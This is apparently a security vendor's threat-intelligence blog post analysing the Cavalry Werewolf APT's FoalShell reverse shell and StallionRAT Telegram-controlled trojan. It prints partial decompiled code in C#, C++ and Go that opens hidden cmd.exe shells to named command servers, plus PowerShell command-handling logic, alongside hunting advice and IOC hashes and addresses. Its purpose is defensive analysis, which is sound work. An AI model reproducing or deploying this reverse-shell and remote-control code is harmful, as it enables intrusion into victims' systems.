CREATED ON October 20, 2025

Cavalry Werewolf APT: Exposing FoalShell and StallionRAT Malware

Operation Trusted Horse: Unmasking the Cavalry Werewolf APT

From May to August 2025, the threat group known as Cavalry Werewolf (also tracked as YoroTrooper, Silent Lynx, and others) launched a sophisticated campaign targeting Russia's public sector and key industries, including energy, mining, and manufacturing. This attack cluster specializes in leveraging trusted relationships through highly targeted phishing and deploying a custom-built arsenal of multi-language malware.

In this blog, I will explain the two main malware families leveraged in the attack campaign, FoalShell and StallionRAT. It also includes a comprehensive list of IOCs observed in the wild for security researchers.

Phishing and Initial Access: The Cloak of Authority

Cavalry Werewolf's primary method of initial access involves spear-phishing emails disguised as official correspondence from legitimate Kyrgyz government officials. The attackers have been observed using fake email addresses from entities like the Ministry of Economy and Commerce and the Ministry of Transport and Communications. Crucially, evidence suggests they may also compromise real official email accounts for their operations, blurring the line between impersonation and actual compromise.

The phishing emails carry a RAR archive containing one of the group’s two main malware families:

the FoalShell reverse shell, or
the StallionRAT remote access trojan.

The filenames used mimic genuine official documents, exploiting the victim's trust and sense of urgency (e.g., "three-month results of joint operations," "shortlist of employees to receive bonuses").

Detection Opportunity: Outlook Cache Monitoring A key defensive measure is to track the creation of suspicious archives with document-like names within the %LocalAppData%\Microsoft\Windows\INetCache\Content.Outlook directory, a known location for files downloaded by the Outlook client.

FoalShell: The Multi-Language Command-and-Control Backdoor

FoalShell is a lightweight reverse shell designed to grant attackers command line access on a compromised host via cmd.exe. Its variants demonstrate the attackers' versatility, with implementations observed in C#, C++, and Go.

FoalShell C# Analysis

The C# version is a straightforward reverse shell, establishing a connection and redirecting the input and output streams of a hidden cmd.exe process over the network socket. The hidden window style ensures stealth.

The core functionality involves a continuous loop to receive commands, execute them via cmd.exe, and return the standard and error output back to the command-and-control (C2) server. The C2 IP address observed is 188.127.225.191 on port 443.

TcpClient tcpClient = new TcpClient("188.127.225.191", 443);
// ... [Connection and Stream setup]

for (;;)
{
// ... [Read command from stream into @string]

Process process = new Process();
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.StartInfo.CreateNoWindow = true;
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.Arguments = "/c " + @string;
// ... [Redirect I/O]
process.Start();

// ... [Read StandardOutput/StandardError and send back via stream]
}
// ... [Close connections]

FoalShell C++ Analysis

The C++ variant utilizes a shellcode loader to evade static analysis. An obfuscated FoalShell shellcode is embedded within the executable's resources under the name output_bin.

int __fastcall main(int argc, const char **argv, const char **envp)
{
HRSRC ResourceW; // rbx
DWORD v4; // edi
HGLOBAL Resource; // rax

ResourceW = FindResourceW(0LL, (LPCWSTR)0x65, L"output_bin");
v4 = SizeOfResource(0LL, ResourceW);
Resource = LoadResource(0LL, ResourceW);
sub_1400011C0(Resource, v4); // Function to process/execute resource
return 0;
}

The resource is read, memory is allocated with RWE (Read, Write, Execute) permissions using VirtualAlloc, and the shellcode is executed. The shellcode then deobfuscates the main reverse shellcode. The shellcode's network functionality connects to a C2 and launches a hidden cmd.exe process:

int __fastcall main(int argc, const char **argv, const char **envp)
{
FreeConsole();
WSAStartup(0x202u, &WSAData);
s = WSASocketA(2, 1, 6, 0LL, 0, 0);
// ... [Setup socket address structure]
*(_DWORD *)&name.sa_data[2] = inet_addr("109.172.85.63"); // C2 IP address
WSAConnect(s, &name, 16, 0LL, 0LL, 0LL, 0LL);
// ... [Setup STARTUPINFO structure to redirect I/O]
StartupInfo.dwFlags = 257; // STARTF_USESTDHANDLES
StartupInfo.hStdError = (HANDLE)s;
StartupInfo.hStdOutput = (HANDLE)s;
StartupInfo.hStdInput = (HANDLE)s;
CreateProcessA(0LL, (LPSTR)"cmd.exe", 0LL, 0LL, 1, 0, 0LL, &StartupInfo, &ProcessInformation);
return 0;
}

The C2 IP for this variant is 109.172.85.63.

FoalShell Go Analysis

The Go implementation uses its own networking stack to achieve similar reverse shell capabilities, connecting to C2 62.113.114.209 on port 443. It forces the executed cmd.exe process to run in a hidden window style.

// ...
v44 = net_Dial(((unsigned int)&unk_51863A, 3, (unsigned int)"62.113.114.209:443", 18, v0, v1, v2, v3);
v45 = (_ptr_exec_Cmd)(os_exec_Command(
(unsigned int)"cmd.exe windowsrunning",
// ...
p_syscall_SysProcAttr = (syscall_SysProcAttr *)runtime_newobject(&RTYPE_syscall_SysProcAttr);
p_syscall_SysProcAttr->HideWindow = 1; // Forces a hidden window state
v11 = v45;

Threat Hunting: FoalShell Monitor for cmd.exe processes launched by suspicious parent processes in common temporary/public directories, or processes with short lifetimes that execute common system discovery commands.

StallionRAT: Telegram-Controlled Access

StallionRAT is a Remote Access Trojan (RAT) used by Cavalry Werewolf, also with multi-language implementations (Go, PowerShell, Python). Its unique feature is using a Telegram bot as its Command and Control (C2) channel, allowing the attackers to execute arbitrary commands, manage files, and exfiltrate data.

StallionRAT PowerShell Delivery

In one attack, a C++ launcher was used to execute a PowerShell instance with a Base64-encoded command, a common technique to evade security products that monitor simple command arguments.

powershell -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand JABjAGgAYQB0AF8AaQBkACAAPQAgACIANwA3ADAAOQAyADIAOAAyADgANQAiAA0ACgAkA...

The decoded PowerShell logic handles Telegram message parsing and C2 communication, implementing three key commands:

/list: Retrieves and formats the list of compromised devices.
/go [DeviceID] [command]: Executes a command on a specific host using Invoke-Expression.
/upload [DeviceID]: Downloads a file via Telegram to the host, saving it to C:\Users\Public\Libraries\%fileName%

if ($message -eq "/list") {
// ...
// Builds a list of compromised devices with DeviceId and ComputerName
// ...
Send-TelegramMessage $devicelist
}

if ($message -like "/go*") {
if ($message.StartsWith("/go")) {
// ... [Parses DeviceId and command]
if ($userIdForDevice) {
try {
$output = Invoke-Expression $command 2>&1 // Execute command
// ... [Send output back via Telegram]
} catch {
// ... [Send error message]
}
}
// ...
}
}
// ... if ($message -like "/upload*") { ... }

Post-Exploitation and Lateral Movement

Post-compromise activity reveals the group's intent to establish persistence and expand control:

Persistence: StallionRAT binaries (e.g., win.exe) were deployed to C:\Users\Public\Libraries and added to the Run registry key for autostart.
Proxying: The attackers leveraged SOCKS5 proxying tools like ReverseSocks5Agent to tunnel traffic, observed connecting to C2 addresses 96.9.125.168:443 and 78.128.112.209:10443.
Reconnaissance: Standard post-exploitation commands were used to map the network and host environment, including ipconfig /all, netstat, whoami, and net user /dom.

Threat Hunting: StallionRAT

Encoded Commands: Correlate powershell.exe execution events featuring the -EncodedCommand parameter.
Persistence: Monitor for file creation in C:\Users\Public\Libraries\ and modifications to the HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry hive.
Reconnaissance: Search for simultaneous execution of environment discovery commands (whoami, ipconfig, netstat) by low-reputation or newly created processes.

Expanding Horizons: A Broad Attack Surface

Beyond the initial Russian targets, analysis of desktop artifacts indicates that Cavalry Werewolf may be preparing to expand its geographical focus:

A file in the Tajik language suggests a potential interest in Tajikistan.
Desktop files named in Arabic indicate reconnaissance or testing against targets in the Middle East.

This expansion, coupled with the apparent testing of other tools like AsyncRAT (based on a found installer file), highlights a rapidly evolving and ambitious threat actor.

Conclusion and Recommendations

Cavalry Werewolf is a sophisticated and adaptable threat actor capable of crafting multi-language malware and executing targeted, high-confidence phishing attacks that leverage a veneer of official trust. The use of custom tools like FoalShell and StallionRAT demonstrates a commitment to operational secrecy and a capacity to rapidly evolve their attack techniques.

Organizations targeted by this group must:

Enhance Email Verification: Implement strict procedures for verifying the authenticity of correspondence, especially from new or external governmental contacts. Train users to inspect full email headers, not just the display name.
Bolster Endpoint Detection: Deploy and tune EDR solutions to detect the specific artifacts discussed:
- powershell.exe with -EncodedCommand.
- Suspicious cmd.exe parent/child relationships.
- Registry persistence attempts in the Run keys.
- Network connections to the identified C2 IP addresses.
Monitor for Lateral Tools: Flag the execution of known SOCKS5 proxy binaries or the use of common reconnaissance commands by non-standard users or processes.

Indicators of Compromise (IOCs)

FoalShell Malware

c26b62fa593d6e713f1f2ccd987ef09fe8a3e691c40eb1c3f19dd57f896d9f59
1dfe65e8dc80c59000d92457ff7053c07f272571a8920dbe8fc5c2e7037a6c98
a8ada7532ace3d72e98d1e3c3e02d1bd1538a4c5e78ce64b2fe1562047ba4e52
cc9e5d8f0b30c0aaeb427b1511004e0e4e89416d8416478144d76aa1777d1554
ec80e96e3d15a215d59d1095134e7131114f669ebc406c6ea1a709003d3f6f17
8e7fb9f6acfb9b08fb424ff5772c46011a92d80191e7736010380443a46e695c
b13b83b515ce60a61c721afd0aeb7d5027e3671494d6944b34b83a5ab1e2d9f4
af3d740c5b09c9a6237d5d54d78b5227cdaf60be89f48284b3386a3aadeb0283
4f17a7f8d2cec5c2206c3cba92967b4b499f0d223748d3b34f9ec4981461d288
22ba8c24f1aefc864490f70f503f709d2d980b9bc18fece4187152a1d9ca5fab
148a42ccaa97c2e2352dbb207f07932141d5290d4c3b57f61a780f9168783eda
7084f06f2d8613dfe418b242c43060ae578e7166ce5aeed2904a8327cd98dbdf
ab0ad77a341b12cfc719d10e0fc45a6613f41b2b3f6ea963ee6572cf02b41f4d
6b290953441b1c53f63f98863aae75bd8ea32996ab07976e498bad111d535252

StallionRAT

cc84bfdb6e996b67d8bc812cf08674e8eca6906b53c98df195ed99ac5ec14a06

ReverseSocks5

Fbf1bae3c576a6fcfa86db7c36a06c2530423d487441ad2c684cfeda5cd19685

ReverseSocks5Agent

A3ec2992e6416a3af54b3aca3417cf4a109866a07df7b5ec0ace7bd1bf73f3c6

How Picus Helps Defend Against Cavalry Werewolf APT Attacks?

The Picus Security Validation Platform safely emulates Cavalry Werewolf APT attack scenarios leveraging FoalShell and StallionRAT malware. Through the Picus Threat Library, it replicates the tactics, techniques, and procedures (TTPs) observed in these campaigns to reveal detection and prevention gaps across EDR, NGFW, and SIEM technologies, before adversaries can exploit them.

You can also test your defenses against hundreds of other malware variants, such as SnipBot, SlipScreen Loader, RustyClaw, within minutes with a 14-day free trial of the Picus Platform.

Threat ID	Threat Name	Attack Module
50071	FoalShell Backdoor Malware Download Threat	Network Infiltration
85983	FoalShell Backdoor Malware Email Threat	Email Infiltration
58435	StallionRAT RAT Download Threat	Network Infiltration
27522	StallionRAT RAT Email Threat	Email Infiltration